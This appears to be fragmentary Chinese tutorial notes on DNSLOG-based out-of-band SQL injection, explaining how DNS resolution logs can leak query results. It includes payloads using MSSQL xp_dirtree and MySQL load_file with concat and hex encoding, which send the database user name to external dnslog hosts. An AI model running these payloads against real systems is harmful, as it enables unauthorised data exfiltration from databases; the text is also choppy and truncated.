访问服务器上相应的服务
DNSLOG: DNS的日志, 存储在DNS 服务器上的域名信息, 记录着用户对域名的访问信息,类似日志文件
DNSLOG利用原理
DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写...()%2b'.dsr7p.f477ch.dnslog.cleverbao.pub';exec master..xp_dirtree @a;--'
处理不能接收特殊服务, 如+-/*等,那么我们就需要进行编码...所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。..., 由于url 有字符长度限制64,需要使用到截断方法
and load_file(concat('\\\\', mid(hex(user()),1,60), '.dnslog.domain.com')...) -- a
转码后的payload
and load_file(concat(0x5C5C5C5C, mid(hex((*************)),1,60), 0x2E646E736C6F672E646F6D61696E2E636F6D